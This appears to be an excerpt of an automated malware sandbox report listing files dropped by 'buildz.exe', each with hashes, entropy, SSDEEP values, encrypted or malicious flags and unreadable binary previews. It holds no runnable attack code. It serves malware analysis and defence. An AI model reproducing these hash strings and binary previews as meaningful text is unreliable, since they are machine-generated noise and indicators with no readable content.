                        SHA-512:96AFB840C7A2706B515199668266C6DCEB3E7028E9E3FD1EBBEE51F8DB5EFC54C2857F5943599166AB409C0958A1FDC8624E9E86D9645B635B4F654434A3D7ED
                        Malicious:false
                        Preview:..b.a.^dA.]T....@P..).t.}Z..4.k7P.(.mH;..l.m..m.J..,+.{.....bj....S.z.g.OTr...0j}.*..8...MV,M.wj....m.f......w'p..;z...-..8.....*3C9.1......dG....@..3.....J]#.......\..p...r....m.q...I.I...h=9....#..GS.....i..s.$f>.v+..3K..../XV.~....&./oS.M7.B..I...G..~.`.....yV .E...HS.|&..)........^.r..E........._;6...H;0Q..-b/.../..C.J.@....tD.._;Q....\.. .z.......5.6t...%.t..F..%..e.}gy.e...]....j..A'...D..$.|..=>..c....Jr..!.i.......:...~?.{..^N.p...`..J.B.[.uE...9.n:.p.3.NH...K..k....E.u2........../..^.C......S........:....."..h....Z......-4...Q.M.+g.v....(....A.../.q.....\SC......e....-R.eE...v.&(_.,...2.d....g..S'Qd...GBp...[..7..D.......J..e..0....oieE.gJ,..../%........G..W...7c..o..}..r.5......-.........b..3f....8...X....0..\......w:e....gt{....s7.-w_|.@nG$..f....Wq8.y....5_...y^A.Zv...u...V.;=W$.x8..y....@.g..}%......T..lm;.EG.....>..AY.3Z.;:H..2......'K-.Y.W...i......@.. ..6?...Y+...."AT~H..Kt.N._.z.<...g.w-t.......\.r.2.....IbiP7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16304
                        Entropy (8bit):7.988745197568997
                        Encrypted:false
                        SSDEEP:384:yOtN/C+TjPYjjAwpeHFoHRNMG3No43cJpw/xSbEy1A:yCQKQxeHuNMG3e43781A
                        MD5:96EAFD84EC81431CF9D05F7B35AE400A
                        SHA1:510D9A66A406C24401E55FA866486389B9F86442
                        SHA-256:F341CEC3236B6B447E0431514020334789F6361942FD29527EA4FF9970F0D4FB
                        SHA-512:4AC5F8AB69DCEF7451716855CDD2BCFF4E670E93817D45C55F35D4E9620C48D31FA10634A7A565812BA23BED977EA887E1FEC0EE9FFE75DD3B89D7292883484F
                        Malicious:false
                        Preview:.hti^..-...v.t'~9.#U....G1...o.9_.M.D.!W.....FS7.b.4.d$..P....h.y.......5..f.....A....y...#.GEf........ ...@l..6.......v.(Hk...BBVF6.e}$U.m....df................w.%*.sjq........b.).S.(.F(WF.l....".w..7.A]I.U\..\}G..+b..'0U.U.....q.i....!T.[..U.au.......#G9x$!2....+....b......H.>_.(Gl...>...9.L.J..K..a.....0...s..pun,..b0.kd......+6P..}..../rO..w..g~..R.uk=_....7.p#...4.U......S..e.tv6k./........u.-.....|..).#~O..q...~...id.....DY..R.........=.Q.I....../..b...Z.E.Wg.}........H...j*..F3qN."6.6..w.....IT.G....d....Fq.q@;.zv.<..x....;tHW....;.....b..@.....K.!.7hD.8.7M=ex.....".<.X...,.G..h.....e.43.K.........B..fJ.:..YL......6=..Fv .....%K..-...r...I...|.A.b.oa....S...g...CG.-.l6..[|........Y2J....L..~....*.".....>..*.<2..a.et...x..G0....Bb.#...J.w..-*..dc./..'.........7t+...E.....|.f4...0b...).4...a.P\.%.j.@.l:...,eEP...M.2.P...=.P..@.o.#M...`...M/......%{......[../.!..T....#.w...c.4..'..K%!..%.'.1AAM...?^.....g...].#....6O..J..p....:..~C.d.Z.F...^N.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):55528
                        Entropy (8bit):7.996826511595817
                        Encrypted:true
                        SSDEEP:1536:GMvpX9AfuzIQqhh3pCGnVFSNmUtQjY/K67/PPYL+SY6A:GMvYfuzIVnpVV4UUtQ67/PPYL9Y6A
                        MD5:6358BADD5714C08F61AFBCF25B2A0FF2
                        SHA1:D88FDF875E9E5709A76BB686F15A4FF288B23EF5
                        SHA-256:FBE8B7A652DFFED08D555A210370358BAF219B5C32AD9FA26529D7DE0D0EDEB6
                        SHA-512:D77DFF1F82D8381009033E0D9C08BE74AEC721E1C413BB36C10D26960D81D9B5A09566925937FD6C0562F7782A0CA6402AF2422E98D4AB08A8090BD794F408AC
                        Malicious:true
                        Preview:.va..2dDd.Ui7.oV.".Q..w..;..6.!:....<.)P.2.%b...+.'..Np.;..c8...^.X.Urk.....E.zU..pP......5.q`..L_V...Q}d:....mc.1..V.>....5.$.jnv..J.,>.(.."...6._..ws.+8..9S.^...=.%.%.FZ^+`.....(%..\j..06.*|.|.......Vj.7...mK...s'..D..J!#.f.......E..A..pxi.1.9..gRMs.....NZ]i..2..d.g..l*..L.x..=..L5.0..eiGy....6.J..9.....dgV\...Q..$.n....7(.=....^.....T.9_ P`...6.n..Hy.*..a....^.n{..%<.{...+4...o....^$........eR%9>.6T.-B!..[...1.8.....=#.BFQk.k.0.u.VcV8]F.Y.....,.x....1..$....C.;.>U...d.?...%*..zR..q...r.a..5...........N.vI|..8@>.YxW..P.n.:~..4.....x...eP$W...4......rXV.bn...[.>).$$..A&E...e.L..r..F.'..w.HA..**d..'/.9..:.',..g.^/EA...K......#M....A.......R..... .......j.0p..B......CL......,.~N..;.......*......>huUt.8..5D..F....m.N.L..9.....2.%.yB.B>\z.."..>t.p ...<e+_..hIz|]....\.%-..a=...F%...s.i&......m....he.....q......b_.w:...D.../J5.9...$....H..=P..m..........*./....F.N*...B.AU..Um.7.-.F.......h....,.|S.l!..o..npno....{.....x.#.....<..qr....B..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):178502
                        Entropy (8bit):7.92236596406836
                        Encrypted:false
                        SSDEEP:3072:jLMWJ8Ik0cvAYSsbUYcr3ZnYMXS4v/VNTapiUx6t039An4n7VFkUIcKd2pRXGA:jLMx0MA4Ubo4vNN4t9AnaAUbpRXP
                        MD5:68999607205CE4607854ECEF14907368
                        SHA1:C51C6BD04415EDC51D507C40CD71945228DA14BA
                        SHA-256:9E307F6F3282B7BF6AB498D1218F7D442BAF54C54C0DCBF6DAB509B1D293DFB3
                        SHA-512:31EA5091E87829802ED5CACF274CDB9143A17E4171D54C4FC02E7A7B55D39A9D1E9EA14AFBEE790207B9FED451F8C27646676512996279922C6E82D34775B37A
                        Malicious:false
                        Preview:..sT..m.2....P...y..d.......Pt..z....QU*....}|.....V\Q.(.;..y...[..=i..%...L....K!FE.q....G..}.a2R....h.....n.:.B..4Q......!Mp....rcR.k..3..........0y[;M:8e.$.I@........;.V<.......@xA......U...B.....R....Cu..\.f<...M....+h~*f.;.T.....o4.N.`..(...\....l=...$e...PRbBZ..<.}-..21c3I...C.....X....mv.7....t......@*...>N.K......].....3..1;6R..n...~....:?ts....?..[.G.O..Q}..B.!..e"...).1.. M..Dm.G...].9..qK.."....}f..jN...ZR...............~.F*10..'.!%'..0..e}9u..|.|3.d.]......%....X.......".p.t.]^i.6g..:...|....?..MF.[.|Vnx....&.G.w{^.*/.L.V..X.H...8....B..t..%.....r3u='....S.T.?R.._(|.5).......)Z../..b..Aa.#.x.G1....A..H.~....../.2D.m.k|.Z.....rh..5a..b......~...T?.....BAJ.P9I..@$.....I.S....e....b...:..y-.Y.].......`..D..H.Iy....x......Go...cA.....Z.(.........=...l8.{o.S.5w...k..nV........~{.wK..........K^.jSa$.5Lp..;.U..j........aa....T..X..."..'{.Qk...t.8....1d....>..O_....ZZC...d...A.G.3....@4....,..2..[..-..:..........W.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):343
                        Entropy (8bit):7.152422702830007
                        Encrypted:false
                        SSDEEP:6:F27YBaHT/dE3WY1LnnKrxfFkyk99ruu88FMr8FGcii96Z:FBCT/dE/LnqfF7sCL8F26Gcii9a
                        MD5:A560B8A208C84CF7E43DEBA97CBE9F6D
                        SHA1:8F6EB6D810AB020E5ED760355945549FA7991F2E
                        SHA-256:9EF7A9819E3364911AB88C9A75AFCC4EF547E4C2D0E4151CE6631905D1271098
                        SHA-512:B0202937160294133DFA79ED1728DD22A99E1E210B857A81167C5EC4A5919F1A91C64FA3E5D24ADF88C83EC5C4444A2375B01751B5F913E8F15F810C9202BDB8
                        Malicious:false
                        Preview:.z{j.b`(....6..hEYZ...4.D.Y.`R.+`...S..`)..,.T.........LQG...;....a...q...........|...W......C.cW._..LP..E(G...V^..e.i.c...WP0.....~sR;i..,Q.....b..+Z....r..(.....J....Od3...O..~.!...:..;P.../..D...0...V....".....cC..:..(..}.....9....YE..@.J.W.. s.R9.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41944
                        Entropy (8bit):7.995256849590534
                        Encrypted:true
                        SSDEEP:768:HcI2r/DnnWWRmvofgOvjRPMEw7KzszIAYexrtgBPH6DGnsYA:UrrWmcofk7L0AYQJiAYsYA
                        MD5:AEE0028C051B0857EB0117A9E7A62C86
                        SHA1:2C184B2237ADE59CD0E713651F8711C8DA9C29AB
                        SHA-256:8EB6F8ED61125145007CA30AA158593CA4B69EDBB9F1BCF6DFAFF847FC7BDF64
                        SHA-512:94CFF64A1765ABAEC8CB25A9C9B8322F44ED300E6A7DB9692128DC7E48E94ED9F118A285659284AE0396112E854C3A66473E5AE013C593A029FD154A5BAD4B40
                        Malicious:true
                        Preview:.va..g]..W^.Q.:.........6..5=2%n.0..3R_d...Y..w..|..wY4...E...a..Xr.v}X.......J.c..G.'.J6*R..Q.,..]..|.3...Q..?2.b`.O.#.^....[...7...z..$.[$]...I.S;..-...^.7A6h<V.?.,&2....._,...k.B....v........k.....y.D.2..'...<.[.5..t..3S..?$.L.e..|.....X..Q..-...eI..8b.}..D}]..1.;O..s...i.l.~,....T .?#.l..h.....%M#....].../{...`."'...g...9\a........o.&RJL........_V....l.8..x..Q.MF'.{....B..dR...(..-.&E.."....rn.v(Hf....0^(GPX.5}.V.k.qqVG.3N{..>X...g..39..b......S,.7SB.J.{.V......#....6.'......i_...../".).l.}|...>.<..N.>.b?P..@S9...~..m.q..5...>..n...z..:{.l6.....8......../..+.....d.S..........a.=+...5......O..3]w......O...bL0.=.H....#\S.=.E~s.M'5_C.x...)L}..H.?.Q.a.j$.Ss.L...a6Z&.!./....6y3..1.Y....6...OH...._|...8$]i.Q&".F/[.....XGM../.;. .^T....^..._...,....t.!.p..F.A5.'O...&.1.u..o...%q.C....(.."...A./.N...A4E...........kw.mWj...Nr...6..E..05...._[f...Q..<;[AS.1..h..g!u./B2..v..$......c..^...z.X^...:.......F.|5.....J.N.7.e....*.2;.p..A,....3..+.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49454
                        Entropy (8bit):7.997059920942747
                        Encrypted:true
                        SSDEEP:768:flvJZ7C32Ooy34CMy3HyiWr4DAlq99PJBIqJH6OLHqGh9dHrKX/B0FWMRQ70Gsfj:dv77N9y34C73yioiAuLJLxJRxFZgA
                        MD5:C0EB3DF8D2D7542FAB7DAAE92A02860F
                        SHA1:8ADC01D792C9C383286D17405F82C153F3A1A64D
                        SHA-256:E4A0658CB7E77FF602E289B5A38ECDC99A90ADC0BA6B1A95CC7B30DB8371EBB2
                        SHA-512:2740CD34C417B19AE91E84A62A5B61D2FE4208A85235FBC2CB770AA3EF7046E83D103CF82391A68FEBB05A6885C03DBCFF82B47AA6FFDE1639C3B56EE7D41BAC
                        Malicious:true
                        Preview:.......B.\.....+7K`&..8.%...AW={N.Kf..j:x........!.PC..i.t..s....Z......c.R;.zK..&.c..bB..@W.l.y..%.....A.."h..0..|.......AG..j..@T......&..r.Xx$.....'..ITo.<u..bq`_-{.9.&.....V.]..}.tKA&CQ....749...7~....+.X4.E..gP..z..Rl..X.V..[MyY.......]xcr.+..W6.;9.._,.7P.....;o.55I#..#^......rq8.C$j..gH..$.~t4.vu..;.}.mq?a.S`S.........>..w.C.@./....iKX..bf.xJ.~.t.v..d....<...`.ZQu..,.a.4..\.B..G..x.W...]...EG..;@.r.X...H.8h.$..}.`3.=.Y....|4..oY.mq#;0CnoT....H+H5.(.}..<.?S...|H......B......g.-.G'-.....n..A7y..5..U4.<\.._.n..,..E..g.....?.......;^......R.G.....')...K2..?.!..W..u.q..HO...6...(.,.QL....f...H...}..._..j...6RgM.5.<..J.$..l....u.C%.nV3.u.5"...=..5.N..U..y&.$.N.%ct.......S......ik....&......^`..qG.G...@.^.Wzv....y..h.....d.........}....*...Z.....\P.G.K..P.w4P-...@.0....1...P=.p.].9.0.=n..... .r..!.J.A.....N.v\67k..........*.M.?.k..fly."..b.l..(.\.`RZ......SP...9us\N.........0(uW7j.O.]9.V..P..e4F...6..%.6.0.R....w.u.5....1.......s0.?...(R...`u&2
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6092
                        Entropy (8bit):7.9716276869492155
                        Encrypted:false
                        SSDEEP:96:5o6mfSTPqP1Cm+z7M+iXt5/Qx2y8tE4RYUcaalxlL55oS1dmPvAXIPwDAZES5ZkP:WfEPqP8M7Xtqx2y8tE4eU4lwmd2A4oDj
                        MD5:FA91711C6C5259CF53981764C629D10F
                        SHA1:7038C83B52780FA414ABBC649712BBE8ECE3B8B5
                        SHA-256:4E561F09FC55A167700E2927847E4704072A1D4B8A355D6ABE9A3D583E1F0176
                        SHA-512:FD90847577DE542E0D6A42EC54E72C4F8FE09A1F620DA354AF677BAE47A1C0352C4553861B7E618E859E53E48202695F0F7D19DCB2A600E07EEFD717023A56DC
                        Malicious:false
                        Preview:<root].....h..Q...]....%.........E`D.FM....G.1[..G..D.3.v..!?.Y%.6.w...H..........cLcT'\.. ....6.u...aI...f.G<..........|+.5....I.j.cZ.a.I.....f...`..o.a0.>.,...n....7.tq.....R....N....y.~......d...6.............m.Q.r[:..X.....6..e..ae...q.......H&r.6/w..k^..d..y$~......q...>1...e.kS..m2"v..<S..?..#2....d..%...T...5....8#..&T...<>.F.Hhq.,"i....w...H.F...%*.z...9....u..0;.J.7..^.Y.....-R..o....4.....8..Z....|.g...A...{..E...9.8._s.....Z.#.1...;b..N-....\a...M.a.........<W.U.k.u....%?.&JH..%...[....q..X..T...dq9+_..&.R..*.....&g".U.>....@;.|nb...n=E...(.w....:.;X.6...Xt...).IH.'..G..s.Zl_....U......0..}uB..6r.9K.*..0..'...eA...o..D.i._....m.u...(.|...|NF.....).2.f<e..L..(......g.=t`2....jU..xm.6..M.'.Y..05AB.@....v".......M..p...'.W.S.0.3cq...:.*4....v.]...<O[........].ioo..lY.Mm...2Z...Dv..?...O).U.<..f.L..U."X..OB..%]...+.0.J>.).u.F.#'.....VR../..#F...5~...4..%..........8....K.....z.<.%.....i.&...[,..SLh.w.?..}q.J.~+".Q.P...}...!...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1573198
                        Entropy (8bit):1.3191186741064151
                        Encrypted:false
                        SSDEEP:3072:xXIQ/BNumZGSwztaABtKLP+EYoTK644f+UiNjoh5QUKx2QhCQiiYMucfezqZaPaw:xXIUN3GSeta7zVTQFUJQb2BRoOqK
                        MD5:15B06A43FC678FD748614E4E270F3253
                        SHA1:DAE35827379F4A2C58BB0C80E813157FCC0E2AEF
                        SHA-256:D49341324E5EF6B691FA2EC4C3AC1E9FA40C8D43EF6058EBDD363638BF81EC1C
                        SHA-512:D5D226B1F7A9E6795F2542C01D88DE7A626217F045F55A0E59318D8CC65E0FF11E8064ADEB299FCEB3D5B2373E6045B2159D7F43142C299D47EE276E093EDF95
                        Malicious:false
                        Preview:...P..c.i.0...N...g.X7.#{.......s.......Y$>.~Z_'..{..qi.;i..>n.a...xk..E5.....MJ.&.Az.M.}....GI.ZI.n.......B.@...t;....%..^"..7n...!...M ....Cj.'..W.D...&....b.4[..W....1G<..R .t}$...#..z,\m.."......#..B.4~yR..f..n..7.D.R..kp...>.V.O..h\R...C..%`..C..f.e........#;..^z..-...2>.e..Ce..|]..Qh....H.;....?l..7.p..&93..z..p.......1..o...ATX."./..O...V.\....H(..A..9.....5.~.9r.TaE...VQ.\%i.....e{..o[1D..-...`.D......B.%....L%....%.Z\..w.Z........K.9.hT.4#@.qa...]`.. eLr't............. ,.>E]L.R..u......x.y...[|.Z-.C.._. 2..\...^..%........R|..`s.lN...e.@....6M.J.GQ...D......u_`jgX..k......?.l..A...eSZ.V.I .....[.8Ka..dE.jT.[..mW.GU..X...`T.6).B.n..l....u.....z.BK..]...Bf.Z..tj"..M..S....g]............=.E.%......vM...NG..Z...6.....<gF]}.N.m.F.=.....9.nK.Xe7Y.!E..G(.q.|......$.Kr.[':7..,f.%...'.hC3..... ..{...8.......M....L/.;{3.S@.._.a.........%...y.l../{@z.S....wu\........`...{c...wOm......Gk..r`&.....f.......F.B~.X.(4q.L..5..T..F.V...<.V.K....~.". |7.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.989680962362683
                        Encrypted:false
                        SSDEEP:384:HVvT+WXAHsdYQ14j2xKA9DkuQYfFa9nWjqI+v/wA:hT+Ww9Q1i8G3rk+v/wA
                        MD5:12570133A07C0B832DF267CFCEF59BA5
                        SHA1:C7512F170F853131033262DE4571FA3C03465056
                        SHA-256:7F6D2BA9950A674E9CCF771572C544B6E21270D2358678BBA1D6CACE75E871A5
                        SHA-512:AC946062EBACB6E76D46CCE887F7D1031A087E421A4E5DDA371368A7833DAFAA61D631A525F7A410785FEDED0C45CF1864499C10D2419D6E51F00E6DFD5877DB
                        Malicious:false
                        Preview:L...2I.V.".....Oi7.g..l.r..G....Z..m&z.?.J.Q...s...6.4..9D..QYJ."..5....n....%.o4.H.M..Mm]...>...8Dg..]...n..c......\....d<.^.t.5Tu.}$..Tx:l..gr....F`..<..+...;'8..^G.Q..Y......er...... ..V.&.`..C`...3......Hk.p..o...o..a..@.^.wl..)&p.l&...Z.#w.$<.K.J.7.>o&I.....)2l...<.........z..,.C|&......gT`...c.....|+....m.EW..i,N.|]*._..:....kn...-*.....]0s..d65P..|..]].#...e..b..r......]C..+.../..-.......y......J..p.... .6kc..~.Q.ny:6D 7a..We.AWb...+I.H 6..."..dh.?.t..$x.2.!9..N..V.~[<....xo....zB._...G')^5j.=.[..~"..jQ6f.Z....T...!0K..Ci^Y.J.P.h...Id.j./f.0.".....E;.T....X.I[....4%...d...._.$............H.>..W<.o...#..0d.}n...E...x.0.4...:.~U.8......QE.q.....M.*.F%L...1.i.45S.A .....?........$C.J$^$P..>..k.%....A..;.W.....z.]p*...........q.0....D..3..p).B.....Rka.]F.....)..{..%a...p.h..H\].......B...Tl......B_.A`.5%.....b7...M....ms{.l.H.i..:..V.............._.).>.....O.bw.-.d..$5..!d..`.MMB].c....6Q.....M.].0.g....Q,..g.../i...2T&....R..;4xGtr0.E
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2097486
                        Entropy (8bit):1.058592543137885
                        Encrypted:false
                        SSDEEP:3072:51ZuqYbE91aHPUJSf5n28Mm7Ll8im8SPqbl4triKe2pF8kWGaxMAaxcA:5XYgfSfV2qHlS8Gq6riS6/KB
                        MD5:4A9535477DDA3B903AAE3924A3C67661
                        SHA1:FBA62006D32AF307D6A5FA0BBCFBDEDAB17B8960
                        SHA-256:B447FE93BA1E6A2826778FC1D4E48141BF54BB4B0BC4B7F57C0FEB542B502BC4
                        SHA-512:9B864FA66BB7D13AFA1AFB00ED6F06D408C9AE543488C80B56A49B581F872208445303A22140D9DA20FB1C61E0ECB998558634B65F217B3328ECE2C375227E23
                        Malicious:false
                        Preview:.........>...>..l.@.H.w...m........B.aAI...xI...s..=y.G....Q.zr+Z....n.......).LK.Vu..I..;...pg......t=.1..@'...o.j0.G...2.H..bfC[.p.s..vI..2.a....m.(H._/u.:qP..db..8....u,L.Q...x..Y...%.).~.RMv.........O...G.....[...Rt.b.yl..R.TkM....hNY......in..K..s"U.yp..N]y......w.x.^.Q.\..#.......m.^...#.;.1....^..............d...u.B.h..........G...j..7..[X.9...7).........a..(....M^r.d..q.D.bJ.....G....u.l.$g.a...'...e..u...5...6...(0.....AvcH..Y..Z...^E..h.s.b....C..`.0."../..ZX.Q....C.$.z...l^3.].@\.~......wlS)...6.....L.5.)Xw#;.....e.Ss.e.......9... .*.r=?.9......}*n.'GB..."...x{1,.........-.o...Gg..T,Y.;.....Y..A.Z.....;..R...r..y.[...+.(.j.w.s<..6`X.na8.5.;U.....T..o*...q^...s..5...LHk.1V...V.6d..*..T.?..<..../..V....!.4a..w.UJrS..g0}D)8.[.B......[...Ll..Qt.x.n2E........>.JMH.....g....S.&.....+...i.o<N5.r....F.>P.m...jg'....d.....,.-bk..2..o2..."...:H.df]...c.;.}...."Fr7f..G.......y|8.H..c.W.D{.1.>t...b.k)..D'=I....p.E/;`.:..M.L'..X..Yu.G|..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.98923839104278
                        Encrypted:false
                        SSDEEP:384:f2cxXlLk5rBGJh/S8qMPJkH4gtqhy1lA1la0Rm7n5nEJLCA:fLVLSQJh/SLMBasy1fjZEJmA
                        MD5:1F5F2D350A76C9E07EF2C47B94866A72
                        SHA1:E80D82D9AB9DAB354294B5FF8D00539059DFA1F1
                        SHA-256:244887B9DFA7D0F748CACDE86A4244740CCAC8B1CE9F56F1F7DCA5AE32458965
                        SHA-512:ACFF3E3C296F680FC8C51B11AA2F8C436B8D03C3DA5686E87EB040A3FD5E39766F135E224B28AAD3DC252BD83025C4440EDC08F5D8B00AB2D2196A9F97306704
                        Malicious:false
                        Preview:.5.!..5....7..K.Q..V.I.&i..G..P5........$N..nC..k.%dz.dA.-xs........q...?...>......G..8...u.&.O. ..~.(./,...<.."R?. .Xe...Z.AU.DL..g<.]..Zv.[.p:.+.k!....9.1...>.<c..:....zx..1..|il).4d.....0.U...............%.cu...........:x..c.-[....]1.j..7..+i.C)D..o.9..[.zs..IW.N'~.:...y.G8Ehc....?..t[4.z..+[...c..... .O."..w...,.'..2..q.j}.F..:9...]-!c...fX.2P.....Sy%...n...La.....VS!m.R..I..rP....k...*#L.L.A.].-.h9.12@.VV.d...46...s......ni...Q..m"U.l.;8...MK)"Mb..S..{...Y^...4..!....W..RFA2.$...F..2....A.b...*..I.#..j........e^1...-c.G..y..PD...k.<.>x..M.U..iS.zmn..J9...q.O..[L.`..}4{......=..[..S.]...Ukr..?R......#....."..1.."*.x..,$.3...M.]..{_ .K.u.....9.>l...N.2AB..$..G..._-..=].[.CT..*>.%.......a...+.Q.....$..B..1..z.y.n[Q.@.E.(._.+|.....z..#....rNC.[.T..........7n.....`.9..........2.n...#...+..o.W..h..|..6.K.Ex.Z..S..[..U@J.<xvr...B..i......x.....4...9.so...]{....?OXh. ...$.g..k3o...Z...2=.k.."....#...P.u..?.........<....;..2.j./.6....^.7.uS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.97810576719113
                        Encrypted:false
                        SSDEEP:192:eXzJ091pv1IyhHDJXKdFzfy6f+67kvzxRgrPda7CP9QOv4C4ATRu39A:2+mUJadthf/7kNRI9Q/AduNA
                        MD5:73F11B7E102842414666F1D11D898477
                        SHA1:6E61FFDA8132F6BFF907A3263A661ADC272C233E
                        SHA-256:E96E4385AB36B1019223A064E5C6E0D0958D6EC49017C4E4734FE458440C4C24
                        SHA-512:91CB79F08B20121993A14EB4C9700C7ED6F5938FD691ED75B4304E3E2CAF475EBA75B57148E22DB85E9BFDE633EBFE325CA915DCB5983F252E48348FC215B782
                        Malicious:false
                        Preview:......?&.,.....@...BKP ...b...._.w.Ff.>t.w..A(1i?.3..Di.I.\.j._.T..p;[......6...x ..z..F..../...#.xP.-]..x.... ....=U....xw.'*..Y_.:.UJ.-.q=+..W.A..l{9.y..`.8...yL.....:.$]....oD....P.R...2H.%h...DdU.@;......pe....4...:.].n............?s...X+E...]...g)..Y...-KZ.j_C..r.XaIo3...U.&..|..`{...g..(...`,.;....a..D.*....6...a'G.d.=.....j|..Q.|....!9e*...f.f..}...`V.: ....c,..;C."@.Zz3...+w...)O1.&c.Q .&=.:.......>wG.CP.....;...[.SJ..S....BZ..g^.Q....* u.=...H7.v.#"..v.I......5..1...Uk.....Qxqc....V.Y......k..B..h .....1.c............'P..+.....W..d...%...u\R.)..z.tw.....s..~.2..P,j.....#J})..6........!..l-x.+..y=.3<.K....a.9..EMB>x2..*_.N0m..Y?X3,._!...6..7o....<.'C...r..(...s.1...j..=..z..}.N..9..5..F,y.|Z.d.x@"..}.:.8...V.E<.JqQ.Y. ..9.YU.Hm..cgt...1.....18.6?.....HM.......2....8...D.....E$.....45...d...Os93..$.3M.l .........:...F5n.N.]..,...8..T].$d..@.(}..H].)F.V}i....p".\~...#vIo.;....T..Q...R.B`BugM......y........<,.R.._...G.P.....[3......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.207849139607789
                        Encrypted:false
                        SSDEEP:3072:PMdIrZskl2fwlzBtG5ujKDhW6SN01bRCqumyKbVP7ELzb1Q4u55DTA:PMEewlBtG5uojFumRVTEnKd52
                        MD5:2D4BF59F967EE1916A1A841DB81DC66C
                        SHA1:3038DB216CA544E4FA4C15CB739FB886CE18FA7E
                        SHA-256:EA4E3E90D141850C2DD3CC0FD96F1BC386CA8A5FD64DD549C243ECF5DBC1CBEB
                        SHA-512:B10B42E998CF8AB6EB69DFF01D9D55AF16717BD545CE222E8B776C407FB9C36B69A66BF14C355D8E91B54E13DF8F5F390A94627C0879A28B1CF9F3899B11355B
                        Malicious:false
                        Preview:.....Nc.'..ij-..5...O..Z....hS..m..0.O..!..M..~TJw/Q...T..".A..2...5..#.}e.|%D.,p._.....5.2$.....t.<`.P..%"......s.`..M.}......2^...\zh.>.+z.Y..uw_...Tz..K8......3.....DP7..Cq..V\..O..[...c...eM.kQ+......C...........O...T..!....uP|..*..4....9......9..:..W....w.....9.K:#...J...4.gE.wv..[.....&......JQ..q.IQM..>>T.r.;].h.....O....#.g...'A..Y.../...B.CPZ.....`..)...X..>../.#j3p../fX..M.Y.w.`Oj...b...Kg.JZx.`......&..2..9w.u..U...&.zF.d."_...Dl.r.2:..ca%....1.&;x g..s...J.!.....v:..!.......'~..Z....".....a......frnn....../..ll/.#~:U^.}..%.FX.M.?f....#Sr..xyZ...8J.e....\b..z./X....C..J>...-.=.....H=h.........R&.pC..:....6".c..B.+.f....G....6.b|f....#2;?'..y.....|.....'Z.O.......#.}..%|4.U....T.......E..!cI.....7..!.:....;.d~.....x..N..1.....`.v..U..sOE..J;O....k...SN.K....i.8..f...Mxt..sR...wu.>.Mq{....>.T....j%_.q.3.>CyTt..:..X.;..I{..%S.....W.a.J...r.....Iu..@....$p6...:..Dh....}...4.X.....h}..W..#..3..b%...K....F.2...P.sH.u.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2080841001844638
                        Encrypted:false
                        SSDEEP:3072:Eyk9LKOq4qxNzLTlNQjsWoOYQlDEPIbqJ2E3APATmORGfA:hP7xN3TlCg1Ohl2aqzasd
                        MD5:8F219E0C5D51FE6209773C8234EBEC1E
                        SHA1:0834E10F64E5A984B83C11BE88EEF0A807C9DCF1
                        SHA-256:1D873A806C023F334BE3C9D4492FFF3ECE28D8E892527E2E3A482052DA3025FF
                        SHA-512:640D70BFD0E6BFC7F17EDF95376DCB433148D5E806E04ACE447B8503E2DE37E0B4E5B489BBC986BA05C9C53AF3A9175196D3A099EE9390782CB2E39B2ABB4232
                        Malicious:false
                        Preview:......AW....`..t..&....j.8.;Y....<.'Z..LK>..>. G...z-f.:lH.+IXk{....l v..A.D2.c~..[..Q/,.......=<.bJ5....j}a*Y..L4..@..j...........6....N..f....)..[..i..O....7m3I..R......z..].aG(..C..W.m+.6+5..c9..+A4....G.7...........).Bh.....(Q.tx.....".mB.RP7Y.?.......>.H..4.5.P..SZCK3.u..p>..`':<@.....(..x!...+.5WO.r6wB....J9.A.J*W.ZO1.<.jO..P.!.../..I.{.Q......*q..........v..9..y...i..ig.Dj.:E..].).69h..V..._....Nw.JD.<zz.U.5....[P...[6.t.9.!..ha...... .....%.Z..x...b7:..j...*...3l..t.."G:W...k1>b..h=Lx}~*...p.....I.r0....[yZp1..x.q..sN....{....p..0Z.....6Ji...PI%..e.Yb.P.c.3..~go.6:.a.k.F....wN8.h.^?DOF.ql..+......Oy..}.2..s.L.}...l....p..ULslCw..N.!......$......"......). "h.x?..I>..i..V..D.\.%}! en..p.Z..c.Kb..x..<.{....k.aJ..gE.D..c\.g../k.a.-..?....H....|M..G^5(.~Mj[..He....&...@..7.S/|..8.i.y..L.O..<....|.:..2....Vb@Zea.A....F....D..U]....x[.:................. ..k........9.....?8......A.t.L..*..............*.$.z..Bu. .......O.'5N.m..m7._..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2083477451677793
                        Encrypted:false
                        SSDEEP:3072:AqCfGeBZKdG/4Qq0YHWinm+gS39O5k+reEj2rVoKXO7m06QA:MZBwdGRv6l2k+SEj2riKp06d
                        MD5:FBBA01E281EB779AB9C2D3158E2C303B
                        SHA1:468DE657E45A89C9237BA23596B7649CEEDDE2E3
                        SHA-256:7C7476824DD6FD36B633CE71F1AEECA603595BD9E87ADB959DB06D78AD92B088
